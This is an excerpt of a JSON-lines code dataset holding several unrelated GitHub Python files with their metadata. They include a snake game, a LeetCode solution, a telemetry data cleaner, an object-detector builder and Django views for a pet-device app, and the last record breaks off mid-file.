speed_worm_y = 0\n a.clear()\n a.append(\"r\")\n a.append(\"u\")\n a.append(\"d\")\n if event.key == K_DOWN and \"d\" in a:\n speed_worm_y = 20\n speed_worm_x = 0\n a.clear()\n a.append(\"l\")\n a.append(\"r\")\n a.append(\"d\")\n if event.key == K_UP and \"u\" in a:\n speed_worm_y = -20\n speed_worm_x = 0\n a.clear()\n a.append(\"r\")\n a.append(\"l\")\n a.append(\"u\")\n worm_x += speed_worm_x\n worm_y += speed_worm_y\n if worm_x < 0 :\n worm_x = 780\n if worm_x > 780 :\n worm_x = 0\n if worm_y < 0 :\n worm_y = 580\n if worm_y > 580 :\n worm_y = 0\n if worm_x == food_x and worm_y == food_y:\n food_x = random.randrange(0, 780, 20)\n food_y = random.randrange(0, 580, 20)\n worm_length += 1\n if score%6 != 5:\n scr += 1\n score += 1\n else:\n scr += 5\n score += 1 \n if len(worm_list) > worm_length:\n worm_list.pop(0)\n win.fill(color.black)\n if worm_function(worm_list, worm_x, worm_y):\n GameOver = True\n if score%5 != 0 or score==0:\n pygame.draw.rect(win, color.red, (food_x, food_y, 20, 20))\n if score%5 == 0 and score!=0:\n pygame.draw.rect(win, color.blue, (food_x, food_y, 20, 20))\n pygame.draw.rect(win, color.green, (worm_x, worm_y, 20, 20))\n t_score = font_score.render(\"Score : \" + str(scr), True, (color.yellow))\n win.blit(t_score, (30, 30))\n pygame.display.update()\n clock.tick(fps)\nt_GameOver = font_GameOver.render(\"Game Over\", True, (color.red))\nwin.blit(t_GameOver, (270, 270))\npygame.display.update()\ntime.sleep(3)\n","repo_name":"llllmatinllll/Python_Libraries","sub_path":"Pygame/Snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"22899306787","text":"class Primitive:\n\tdef __init__(self, type, javaType, name, size, equivalent, javaWrapper, accessor, mask):\n\t\tself.type = type\n\t\tself.javaType = javaType\n\t\tself.name = name\n\t\tself.size = size\n\t\tself.equivalent = equivalent\n\t\tself.javaWrapper = javaWrapper\n\t\tself.accessor = accessor\n\t\tself.mask = mask\n\n\tdef __cmp__(self, other):\n\t\treturn 1 - self.__eq__(other) - 2 * self.__lt__(other)\n\n\tdef __lt__(self, other):\n\t\tif isinstance(other, str):\n\t\t\treturn self.name < other\n\t\telse:\n\t\t\treturn self.name < other.name\n\n\tdef __eq__(self, other):\n\t\tif isinstance(other, str):\n\t\t\treturn self.name == other\n\t\telse:\n\t\t\treturn self.name == other.name\n\nPRIMITIVES = {\n\t\"int8_t\":\tPrimitive(\"int8_t\", \t\"int\",\t\t\"Int8\",\t\t1,\t\"byte\",\t\t\"Byte\",\t\t\"\", \tNone),\n\t\"int16_t\":\tPrimitive(\"int16_t\", \t\"int\",\t\t\"Int16\",\t2,\t\"short\",\t\"Integer\",\t\"Short\",None),\n\t\"int32_t\":\tPrimitive(\"int32_t\", \t\"int\",\t\t\"Int32\",\t4,\t\"int\", \t\t\"Integer\",\t\"Int\",\tNone),\n\t\"uint8_t\":\tPrimitive(\"uint8_t\", \t\"int\",\t\t\"Uint8\",\t1,\t\"byte\",\t\t\"Integer\",\t\"\",\t\t\"0xFF\"),\n\t\"uint16_t\":\tPrimitive(\"uint16_t\", \t\"int\",\t\t\"Uint16\",\t2,\t\"short\",\t\"Integer\",\t\"Short\",\"0xFFFF\"),\n\t\"uint32_t\":\tPrimitive(\"uint32_t\", \t\"long\",\t\t\"Uint32\",\t4,\t\"int\",\t\t\"Long\",\t\t\"Int\",\t\"0xFFFFFFFFl\"),\n\t\"float\": \tPrimitive(\"float\", \t\t\"float\",\t\"Float\",\t4,\t\"float\",\t\"Float\",\t\"Float\",None),\n\t\"char\":\t\tPrimitive(\"char\", \t\t\"char\",\t\t\"Char\",\t\t1,\t\"byte\",\t\t\"Character\",\t\t\"\",\t\tNone),\n\t\"Bool\":\t\tPrimitive(\"Bool\",\t\t\"boolean\",\t\"Bool\", \t1,\t\"boolean\",\t\"Boolean\",\t\"\",\t\tNone),\n}\n\n# -----------------------------------------------------------------------------\ndef typeJavaObjectName(name):\n\tif name in PRIMITIVES:\n\t\treturn PRIMITIVES[name].javaWrapper\n\telse:\n\t\treturn name.title().replace(' ', '')\n\ndef typeName(name):\n\tif name in PRIMITIVES:\n\t\treturn PRIMITIVES[name].javaType\n\telse:\n\t\treturn name.title().replace(' ', '')\n\ndef typeObjectName(name):\n\tif name in PRIMITIVES:\n\t\treturn PRIMITIVES[name].name\n\telse:\n\t\treturn name.title().replace(' ', '')\n\ndef variableName(name):\n\tname = name.title().replace(' ', '')\n\tname = name[0].lower() + name[1:]\n\treturn name\n\ndef enumElement(name):\n\treturn name.upper().replace(' ', '_')\n\ndef inStringDescription(description):\n\treturn \"\\\\n\".join(description.replace('\"', '\\\\\"').splitlines());\n","repo_name":"modm-io/modm","sub_path":"tools/xpcc_generator/builder/filter/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":657,"dataset":"github-code","pt":"45"} +{"seq_id":"24835087194","text":"#\n# @lc app=leetcode id=779 lang=python3\n#\n# [779] K-th Symbol in Grammar\n#\n# https://leetcode.com/problems/k-th-symbol-in-grammar/description/\n#\n# algorithms\n# Medium (38.36%)\n# Likes: 707\n# Dislikes: 178\n# Total Accepted: 44.7K\n# Total Submissions: 116.4K\n# Testcase Example: '1\\n1'\n#\n# On the first row, we write a 0. Now in every subsequent row, we look at the\n# previous row and replace each occurrence of 0 with 01, and each occurrence of\n# 1 with 10.\n# \n# Given row N and index K, return the K-th indexed symbol in row N. (The values\n# of K are 1-indexed.) (1 indexed).\n# \n# \n# Examples:\n# Input: N = 1, K = 1\n# Output: 0\n# \n# Input: N = 2, K = 1\n# Output: 0\n# \n# Input: N = 2, K = 2\n# Output: 1\n# \n# Input: N = 4, K = 5\n# Output: 1\n# \n# Explanation:\n# row 1: 0\n# row 2: 01\n# row 3: 0110\n# row 4: 01101001\n# \n# \n# Note:\n# \n# \n# N will be an integer in the range [1, 30].\n# K will be an integer in the range [1, 2^(N-1)].\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def kthGrammar(self, N: int, K: int) -> int:\n\n # edge case\n if N == 1:\n return 0\n \n # the location of corresponding K in the previous row\n prevK = (K + 1) // 2\n\n # the value of corresponding K in the previous row\n prevV = self.kthGrammar(N-1, prevK)\n\n # get the current value from previous value (i.e. recursion relation)\n return prevV ^ ((K-1) % 2)\n# @lc code=end\n\n","repo_name":"fufuleetcode/FufuLeetCode","sub_path":"779.k-th-symbol-in-grammar.py","file_name":"779.k-th-symbol-in-grammar.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"8115478358","text":"from Personnage import *\nfrom Level import *\nclass Enemy(Personnage) :\n def __init__(self, level, x, y, nom=\"Enemy\",):\n l = Level(level)\n Personnage.__init__(self, nom, l.maxHp - 50, l, level*30, 0, 0, level*7, x, y)\n\n def movesToPlayer(self, player, r):\n flag = False\n if player.abs > self.abs :\n flag = self.action('r', r)\n if not flag :\n if player.abs < self.abs :\n flag = self.action('l', r)\n if not flag :\n if player.ord > self.ord :\n flag = self.action('u', r)\n if not flag :\n if player.ord < self.ord :\n flag = self.action('d', r)\n\n def checkDead(self):\n if self.hp <= 0:\n return True\n return False\n","repo_name":"Rotschadel/ft_minirogue","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"21158432859","text":"import argparse\nclass OrderCalculator:\n def __init__(self, quantity, price, state):\n self.quantity = quantity\n self.price = price\n self.state = state\n self.tax_rates = {\n \"CA\": 0.0825,\n \"TX\": 0.0625,\n \"UT\": 0.0685,\n \"NV\": 0.08,\n \"AL\": 0.04,\n }\n\n\n def get_price(self):\n \"\"\"Get price for Order.\"\"\"\n return round(self.price * self.quantity * (1 + self.get_tax_rate()), 2)\n\n def get_tax_rate(self):\n return self.tax_rates[self.state]\n\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-q', '--quantity', type=int)\n parser.add_argument('-p', '--price', type=int)\n parser.add_argument('-s', '--state', type=str)\n args = parser.parse_args()\n calculator = OrderCalculator(quantity=args.quantity, price=args.price, state=args.state)\n order_value = calculator.get_price()\n print(order_value)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yanxuzheng/vertical_slicing_workshop","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"21702482599","text":"# Analyzer to clean up Telemetry data and compare it to the Dozee and EarlySense devices\r\n\r\nimport csv\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndef clean(filename, new_filename):\r\n \"\"\"Arguments: \r\n filename: original data file\r\n new_filename: name of new file to write to\r\n \r\n Returns: the new file that contains only the columns \r\n that we wanted from the original file\r\n \"\"\"\r\n\r\n data = pd.read_csv(filename) # make file usable in python\r\n headers = data.columns\r\n tele = \"TELEMETRY\"\r\n dozee = \"DOZEE\"\r\n es = \"ES\"\r\n new_file = new_filename # create new file to write to\r\n with open(new_file, 'w', newline=\"\") as file: # write to new file\r\n csvwriter = csv.writer(file)\r\n for header in headers:\r\n if tele in filename: # if the file is telemetry\r\n headers = [\"Time\", \"ECG_HR\", \"CO2_RR\"]\r\n csvwriter.writerow(headers) # write the headers to the file\r\n if (header == \"Time\" or header == \"ECG_HR\" or header == \"CO2_RR\"):\r\n csvwriter.writerows(data.header) # write the data for headers we wanted\r\n elif dozee in filename: # if the file is Dozee\r\n headers = [\"Time\", \"Heart Rate\", \"Breath Rate\"]\r\n csvwriter.writerow(headers)\r\n if (header == \"Time\" or header == \"Heart Rate\" or header == \"Breath Rate\"):\r\n csvwriter.writerows(data.header)\r\n elif es in filename: # if the file is EarlySense\r\n headers = [\"Clock\", \"Hr avg\", \"Rr avg\"]\r\n csvwriter.writerow(headers)\r\n if (header == \"Clock\" or header == \"Hr avg\" or header == \"Rr avg\"):\r\n csvwriter.writerows(data.header)\r\n return new_file\r\n\r\n\r\ndef colon_split(string):\r\n \"\"\"Cleans the time format to include only hours and minutes\r\n \r\n Arguments: \r\n string: the time as a string\r\n \r\n Returns: a string representing the time with only hours and minutes\r\n \"\"\"\r\n\r\n if string.count(\":\") == 1: # if there is only one colon, return the same string\r\n return string\r\n # string.split(\":\")[0]\r\n return \":\".join(string.split(\":\", 2)[:2]) # return everything before the second colon (HR:MM:SS -> HR:MM)\r\n\r\n\r\ndef clean_tele(new_filename):\r\n \"\"\"Averages the heart rate and respiratory rate for each minute\r\n for the telemetry data and rewrites it to the file\r\n \r\n Arguments: \r\n new_filename: the new file with only the heart rate and respiratory\r\n rate columns that we cleaned using clean() \r\n \r\n Returns: the new, rewritten telemetry file with the averages for\r\n each minute instead of data points for every 5 seconds\r\n \"\"\"\r\n\r\n data = pd.read_csv(new_filename)\r\n time = data.Time.split(\" \")[1] # separate the date from the time\r\n hr = data.ECG_HR\r\n rr = data.CO2_RR\r\n total_hr = 0\r\n total_rr = 0\r\n count = 0\r\n averages = []\r\n for i in range(1, len(time)):\r\n j = colon_split(time[i]) # take the seconds out of the time\r\n k = colon_split(time[i - 1])\r\n if j == k: # if the min is the same as the next min, add the values and increase count\r\n total_hr += hr[i]\r\n total_rr += rr[i]\r\n count += 1\r\n averages.append([(total_hr / count), (total_rr / count)]) # append the averages for each min in a new list\r\n \r\n new_file = new_filename # rewrite the file\r\n with open(new_file, 'w', newline=\"\") as file:\r\n csvwriter = csv.writer(file) \r\n csvwriter.writerow(data.columns)\r\n csvwriter.writerows(averages)\r\n return new_file\r\n \r\n\r\ndef timepoints(filename):\r\n \"\"\"Takes a file of cleaned data and counts how many evaluable minutes of \r\n data are in the file.\r\n \r\n Arguments:\r\n filename: file with cleaned data\r\n \r\n Returns: an int representing the number of evaluable minutes in the file \r\n \"\"\"\r\n\r\n points = 0\r\n data = pd.read_csv(filename)\r\n headers = data.columns\r\n for i in range(len(data)):\r\n if (data.headers[1][i] == 0 or data.headers[1][i].isnull() or \r\n data.headers[2][i] == 0 or data.headers[2][i]): \r\n points += 1\r\n return points\r\n\r\n\r\ndef plot(tele, es, dozee):\r\n \"\"\"Takes the cleaned data files for the Telemetry, EarlySense, and Dozee\r\n and creates two line graphs to compare values for each minute\r\n \r\n Arguments:\r\n tele: cleaned Telemetry data\r\n es: cleaned EarlySense data\r\n Dozee: cleaned Dozee data\r\n \r\n Returns: two color-coordinated line graphs that represents the data points\r\n for each minute for each of the data sets (heart rate and respiratory rate)\r\n \"\"\"\r\n tele_rows = []\r\n with open(tele, 'r') as file:\r\n csvreader = csv.reader(file)\r\n tele_header = next(csvreader)\r\n for row in csvreader:\r\n tele_rows.append(row)\r\n \r\n es_rows = []\r\n with open(es, 'r') as file:\r\n csvreader = csv.reader(file)\r\n es_header = next(csvreader)\r\n for row in csvreader:\r\n es_rows.append(row)\r\n\r\n dozee_rows = []\r\n with open(dozee, 'r') as file:\r\n csvreader = csv.reader(file)\r\n dozee_header = next(csvreader)\r\n for row in csvreader:\r\n dozee_rows.append(row)\r\n\r\n tele_hr_x = []\r\n tele_hr_y = []\r\n for row in tele_rows:\r\n tele_hr_x.append(row[0])\r\n tele_hr_y.append(row[1])\r\n plt.plot(tele_hr_x, tele_hr_y, label = \"Telemetry Heart Rate\")\r\n\r\n es_hr_x = []\r\n es_hr_y = []\r\n for row in es_rows:\r\n es_hr_x.append(row[0])\r\n es_hr_y.append(row[1])\r\n plt.plot(es_hr_x, es_hr_y, label = \"EarlySense Heart Rate\")\r\n\r\n dozee_hr_x = []\r\n dozee_hr_y = []\r\n for row in es_rows:\r\n dozee_hr_x.append(row[0])\r\n dozee_hr_y.append(row[1])\r\n plt.plot(dozee_hr_x, dozee_hr_y, label = \"Dozee Heart Rate\")\r\n\r\n plt.xlabel(\"Time (HH:MM)\")\r\n plt.ylabel(\"Heart Rate\")\r\n plt.title(\"Heart Rate Comparison\")\r\n plt.legend()\r\n plt.show()\r\n\r\n tele_rr_x = []\r\n tele_rr_y = []\r\n for row in tele_rows:\r\n tele_rr_x.append(row[0])\r\n tele_rr_y.append(row[2])\r\n plt.plot(tele_rr_x, tele_rr_y, label = \"Telemetry Respiratory Rate\")\r\n\r\n es_rr_x = []\r\n es_rr_y = []\r\n for row in es_rows:\r\n es_rr_x.append(row[0])\r\n es_rr_y.append(row[2])\r\n plt.plot(es_rr_x, es_rr_y, label = \"EarlySense Respiratory Rate\")\r\n\r\n dozee_rr_x = []\r\n dozee_rr_y = []\r\n for row in es_rows:\r\n dozee_rr_x.append(row[0])\r\n dozee_rr_y.append(row[1])\r\n plt.plot(dozee_rr_x, dozee_rr_y, label = \"Dozee Respiratory Rate\")\r\n\r\n plt.xlabel(\"Time (HH:MM)\")\r\n plt.ylabel(\"Respiratory Rate\")\r\n plt.title(\"Respiratory Rate Comparison\")\r\n plt.legend()\r\n plt.show()\r\n\r\n \r\ndef main():\r\n \"\"\"\"\"\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"avchin/telemetry-data-cleaner","sub_path":"dozee_analyzer.py","file_name":"dozee_analyzer.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"37932576224","text":"import os\nimport torch\nimport numpy as np\nimport lightning.pytorch as pl\n\nfrom .modules.yolo import build_yolov\nfrom .modules.fasterrcnn import build_faster_rcnn\nfrom .modules.ssd import build_ssd\nfrom .modules.detr import build_detr\nfrom .mmoptimizer import build_optimizer\n\nSUPPORTED_DETECTORS = [\"yolov8\", \"yolov5\", \"yolov3\", \"fasterrcnn\", \"ssd\", \"detr\"]\nSUPPORTED_TRACKERS = [\"sort\", \"deepsort\", \"bytetrack\"]\n\nPRETRAIN_WEIGHT_DICT = {\"yolov8\": {\"n\": \"./mm/weights/yolov8n.pt\",\n \"s\": \"./mm/weights/yolov8s.pt\",\n \"m\": \"./mm/weights/yolov8m.pt\",\n \"l\": \"./mm/weights/yolov8l.pt\",\n \"x\": \"./mm/weights/yolov8x.pt\"},\n \"yolov5\": {\"n\": \"./mm/weights/yolov5nu.pt\",\n \"s\": \"./mm/weights/yolov5su.pt\",\n \"m\": \"./mm/weights/yolov5mu.pt\",\n \"l\": \"./mm/weights/yolov5lu.pt\",\n \"x\": \"./mm/weights/yolov5xu.pt\"},\n \"yolov3\": {\"x\": \"./mm/weights/yolov3u.pt\"},\n \"fasterrcnn\": {\"s\": \"./mm/weights/fasterrcnn_s.pth\",\n \"m\": \"./mm/weights/fasterrcnn_m.pth\",\n \"l\": \"./mm/weights/fasterrcnn_l.pth\"},\n \"ssd\": {\"s\": \"./mm/weights/ssd_s.pth\",\n \"m\": \"./mm/weights/ssd_m.pth\",\n \"l\": \"./mm/weights/ssd_l.pth\"},\n \"detr\": {\"m\": \"./mm/weights/detr_m.pth\"}}\n\nclass MMNetwork(pl.LightningModule):\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.model = kwargs[\"model\"]\n self.model_type = kwargs[\"model_type\"]\n self.model_name = kwargs[\"model_name\"]\n self.model_size = kwargs[\"model_size\"]\n self.model_weight_path = kwargs[\"model_weight_path\"]\n \n # Inference\n self.preprocess = kwargs.get(\"preprocess\", lambda x: x)\n self.postprocess = kwargs.get(\"postprocess\", lambda x: x)\n \n # Training\n self.preprocess_batch = kwargs.get(\"preprocess_batch\", lambda x: x)\n self.loss_function = kwargs.get(\"loss_function\", lambda x: x)\n \n self.args = kwargs[\"args\"]\n \n @torch.no_grad()\n def predict_step(self, im0s):\n self.model.eval()\n if \"yolo\" in self.model_name:\n if not isinstance(im0s, torch.Tensor): ims = self.preprocess(self, \n orig_imgs=im0s)\n else: ims = im0s\n preds = self.model(ims)\n results = self.postprocess(self, preds=preds,\n img=ims, orig_imgs=im0s)\n elif \"fasterrcnn\" or \"ssd\" or \"detr\" in self.model_name:\n preds = []\n for im0 in im0s:\n im = self.preprocess(self, orig_imgs=im0)\n pred = self.model.test_step(im)[0]\n preds.append(pred)\n results = self.postprocess(self, preds=preds, \n orig_imgs=im0s)\n return results\n \n def training_step(self, batch, batch_idx):\n self.model.train()\n batch = self.preprocess_batch(self, batch=batch)\n loss = self.loss_function(self, batch=batch)\n return loss\n \n def configure_optimizers(self):\n optimizer = build_optimizer(self.model, self.args['optimizer'],\n self.args['lr'], self.args['momentum'], \n self.args['weight_decay'])\n return optimizer\n \n @property\n def device(self):\n device = next(self.parameters()).device\n return device\n\ndef build_detector(model_name, model_size, model_weight_path):\n current_file = os.path.realpath(__file__)\n current_directory = os.path.dirname(current_file)\n \n if model_weight_path is None and model_name in PRETRAIN_WEIGHT_DICT and model_size in PRETRAIN_WEIGHT_DICT[model_name]:\n model_weight_path = PRETRAIN_WEIGHT_DICT[model_name][model_size]\n \n print(f\"Building {model_weight_path} model...\")\n if \"yolo\" in model_name: detector, \\\n preprocess, postprocess, \\\n preprocess_batch, loss_function = build_yolov(current_directory,\n model_name, model_size,\n model_weight_path)\n elif \"fast\" in model_name: detector, \\\n preprocess, postprocess, \\\n preprocess_batch, loss_function = build_faster_rcnn(current_directory,\n model_name, model_size,\n model_weight_path)\n elif \"ssd\" in model_name: detector, \\\n preprocess, postprocess, \\\n preprocess_batch, loss_function = build_ssd(current_directory,\n model_name, model_size,\n model_weight_path)\n elif \"detr\" in model_name: detector, \\\n preprocess, postprocess, \\\n preprocess_batch, loss_function = build_detr(current_directory,\n model_name, model_size,\n model_weight_path)\n \n model_info = {\n \"model\": detector,\n \"model_type\": \"detect\",\n \"model_name\": model_name,\n \"model_size\": model_size,\n \"model_weight_path\": model_weight_path,\n \"args\" : {\"half\": False,\n \"conf\": 0.75,\n \"iou\": 0.45,\n \"imgsz\": 640,\n \"epochs\": 2,\n \"batch\": 2,\n \"workers\": 4,\n \"shuffle\": True,\n \"optimizer\": \"SGD\",\n \"lr\": 0.0001,\n \"momentum\": 0.8,\n \"weight_decay\": 0.0005},\n \"preprocess\": preprocess,\n \"postprocess\": postprocess,\n \"preprocess_batch\": preprocess_batch,\n \"loss_function\": loss_function,\n \"optimizer_name\": \"Adam\"\n }\n \n network = MMNetwork(**model_info)\n \n return network\n\ndef build_detector_trainer():\n pass\n\ndef build_tracker():\n pass\n\ndef build_network(model_cls,\n model_weight_path=None):\n model_cls = model_cls.lower().split(\"_\")\n model_type = None\n if len(model_cls) == 3: model_name, model_size, model_type = model_cls\n else: (model_name, model_size), model_type = model_cls, \"detect\" if model_cls[0] in SUPPORTED_DETECTORS else \"track\"\n\n assert model_name in SUPPORTED_DETECTORS + SUPPORTED_TRACKERS, f\"Unsupported model name: {model_name}\"\n assert model_type in [\"detect\", \"track\"], f\"Unsupported model type: {model_type}\"\n \n if model_type == \"detect\":\n model = build_detector(model_name, model_size, model_weight_path)\n elif model_type == \"track\":\n model = build_tracker(model_name, model_size, model_weight_path)\n \n return model","repo_name":"dovedb/DoveDB_MVP","sub_path":"src/mm/mmnetwork.py","file_name":"mmnetwork.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"13318191067","text":"from django.shortcuts import render\nimport json\nimport traceback\nfrom .models import MachineDetails, User, Pets, petDefaultImage\nfrom django.core.exceptions import *\nfrom rest_framework.views import APIView\nfrom django.db import IntegrityError\nfrom brilliantPet.generalMethods import *\nfrom brilliantPet import settings\nimport boto3\nimport base64\nimport time\nfrom .userFunctions import *\nfrom .eventFunctions import *\nfrom .machineFunctions import *\nfrom .timerFunctions import *\n\nfrom django.core import serializers\nimport django.http\n\n\n\ngm = generalClass()\n\nclass notFound(APIView):\n\n def get(self, request):\n message = \"Service not found.\"\n return gm.clientError(message)\n\n\n\nclass userDevices(APIView):\n\n def get(self, request):\n\n machines = []\n params = request.query_params\n\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n else:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n userMachines = MachineDetails.objects.filter(isremoved = 0)\n else:\n userMachines = MachineDetails.objects.filter(userid = params[\"userid\"], isremoved = 0)\n for m in userMachines:\n machine = {\n \"machine_id\" : m.machine_id,\n \"mode\" : m.mode,\n \"name\" : m.name,\n \"status\" : m.status,\n \"userid\" : m.userid_id,\n \"machine_size\":m.machine_size,\n \"roll_length\":m.roll_length,\n \"firmware\":m.firmware,\n \"network\":m.network\n \n\n }\n machines.append(machine)\n\n return gm.successResponse(machines)\n\n\n def post(self, request):\n\n data = request.data\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"machine_id\", \"name\", \"status\", \"mode\", \"firmware\", \"network\", \"user_role\"]\n\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n emptyParams = gm.emptyParams(requiredParams, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError(emptyParamMessage.format(emptyParams))\n\n # try:\n # MachineDetails.objects.get(pk = data[\"machine_id\"], isremoved = 0)\n # return gm.clientError(\"machine_id exists. Please provide a unique machine_id\")\n # except:\n machineid = data[\"machine_id\"].strip()\n userid = data[\"userid\"].strip()\n name = data[\"name\"].strip()\n status = int(data[\"status\"].strip())\n\n defaultParams = {\n \"mode\" : \"manual\",\n \"firmware\" : \"\",\n \"network\" : \"\",\n \"isremoved\" : 0,\n \"user_role\" : \"owner\",\n \"machine_size\":\"standard\",\n \"roll_length\":\"standard\",\n }\n\n for default in defaultParams.keys():\n if default in data:\n defaultParams[default] = data[default]\n\n mode = defaultParams[\"mode\"]\n firmware = defaultParams[\"firmware\"]\n network = defaultParams[\"network\"]\n isRemoved = defaultParams[\"isremoved\"]\n user_role = defaultParams['user_role']\n machine_size =defaultParams['machine_size']\n roll_length=defaultParams['roll_length']\n\n if machine_size == None or validateMachineSize(machine_size)==False:\n machine_size=\"standard\"\n\n if roll_length == None or validateRollLength(roll_length)==False:\n roll_length=\"standard\"\n\n\n user = getUser(data)\n\n try:\n\n user.machinedetails_set.create(machine_id = machineid, name = name, status = status, \\\n mode = mode, firmware = firmware, network = network, isremoved = isRemoved,\\\n user_role = user_role)\n\n except IntegrityError as e:\n machine = MachineDetails.objects.get(pk = data[\"machine_id\"])\n machine.machine_id = machineid\n machine.name = name\n machine.userid = user\n machine.status = status\n machine.mode = mode\n machine.firmware = firmware\n machine.network = network\n machine.isremoved = isRemoved\n machine.user_role = user_role\n\n if machine_size != None and validateMachineSize(machine_size):\n machine.machine_size=machine_size.lower()\n\n\n if roll_length != None and validateRollLength(roll_length):\n machine.roll_length=roll_length.lower()\n\n machine.save()\n\n # serialized_obj = serializers.serialize('json', [ machine, ])\n # return gm.successResponse(serialized_obj)\n m=machine\n machineres = {\n \"machine_id\" : m.machine_id,\n \"mode\" : m.mode,\n \"name\" : m.name,\n \"status\" : m.status,\n \"userid\" : m.userid_id,\n \"machine_size\":m.machine_size,\n \"roll_length\":m.roll_length,\n \"firmware\":m.firmware,\n \"network\":m.network\n }\n return gm.successResponse(machineres)\n\n\n\n except Exception as e:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"Error while saving device details.\")\n\n else:\n return gm.successResponse(data)\n\n\n\n def delete(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"machine_id\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, data)\n\n if emptyOrMissing:\n return emptyOrMissing\n try:\n machine = MachineDetails.objects.get(machine_id = data[\"machine_id\"])\n machine.isremoved = 1\n machine.save()\n return gm.successResponse(\"Successfully deleted mahine : {}\".format(machine.machine_id))\n\n except:\n error = traceback.format_exc()\n print(error)\n gm.errorLog(error)\n return gm.errorResponse(\"There was a problem while deleting the machine.\")\n\n\n\n\nclass usersView(APIView):\n bucketName = \"brilliantpet.user-images\"\n\n def get(self, request):\n params = request.query_params\n gm.log(params)\n\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n user = getUser(params)\n\n data = {\n \"email\" : user.email,\n \"name\" : user.name,\n \"address\" : user.address,\n \"rolls_count_at_home\" : user.rolls_count_at_home,\n \"userid\" : user.userid,\n \"profile_image\" : user.profile_image,\n }\n return gm.successResponse(data)\n\n def post(self, request):\n data = request.data\n requiredParams = [\"userid\", \"name\", \"notification_token\", \"rolls_count_at_home\", \"password\", \"email\", \"address\", \"shopify_access_token\"]\n data = gm.cleanData(data)\n data[\"profile_image\"] = \"\"\n\n if data[\"notification_token\"] in [\"\", \" \", None, False]:\n data[\"notification_token\"] = \"default_Notification_token\"\n\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n emptyParams = gm.emptyParams(requiredParams, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError(emptyParamMessage.format(emptyParams))\n\n if \"rolls_count_at_home\" in data:\n try:\n int(data[\"rolls_count_at_home\"])\n except:\n return gm.clientError(\"rolls_count_at_home should be int.\")\n\n\n\n\n #uploading profile Image\n\n imageHandler = request.FILES.get(\"profile_image\")\n if imageHandler:\n extension = gm.getFileExtension(imageHandler.name)\n fileName = gm.getUniqueFileName(extension)\n image = imageHandler.read()\n mimetype = \"image/jpeg\"\n\n downloadUrl = gm.uploadToS3(self.bucketName, fileName, image, mimetype)\n\n if downloadUrl:\n data[\"profile_image\"] = downloadUrl #setting profile image if upload success\n\n # default profile image if upload failed\n\n user = isUser(data)\n\n try:\n user = register(data, user)\n token = login(data, user)\n details = {\n \"userid\" : user.userid,\n \"name\" : user.name,\n \"notification_token\" : user.notificationToken,\n \"rolls_count_at_home\" : user.rolls_count_at_home,\n \"email\" : user.email,\n \"address\" : user.address,\n \"profile_image\" : user.profile_image,\n \"shopify_access_token\" : user.shopify_access_token,\n \"login_token\" : token\n }\n return gm.successResponse(details)\n\n except ValidationError as e:\n return gm.errorResponse(str(e))\n\n except:\n gm.errorLog(\"Data : {}\\nError : {}\".format(data, traceback.format_exc()))\n\n return gm.errorResponse(\"Error while adding user.\")\n\n\n\nclass imageUploadMultipart(APIView):\n\n bucketName = \"brilliantpet.user-images\"\n\n def get(self, request):\n\n return gm.clientError(\"GET method is not supported.\")\n\n\n def post(self, request):\n\n imageHandler = request.FILES.get('image_file')\n if not imageHandler:\n return gm.clientError(\"Required param image_file missing in form-data.\")\n\n data = request.data\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n userid = getUser(data).userid\n imgtype = gm.getFileExtension(imageHandler.name)\n fileName = \"{}_{}\".format(userid, gm.getUniqueFileName(imgtype))\n mimetype = \"image/jpeg\"\n image = imageHandler.read()\n\n download_url = gm.uploadToS3(self.bucketName, fileName, image, mimetype)\n\n if download_url:\n gm.log(\"Image received : {}\".format(image) + \"\\nUrl generated : \" + download_url)\n return gm.successResponse(download_url)\n\n else:\n return gm.clientError(\"Error while uploading file.\")\n\n\n\nclass userLogin(APIView):\n\n def get(self, request):\n return gm.clientError(\"GET Method is not supported.\")\n\n def post(self, request):\n data = request.data\n\n missingLoginDetails = gm.login_details_absent(data)\n if not missingLoginDetails:\n return missingLoginDetails\n\n if \"password\" not in data:\n return gm.clientError(\"Required param 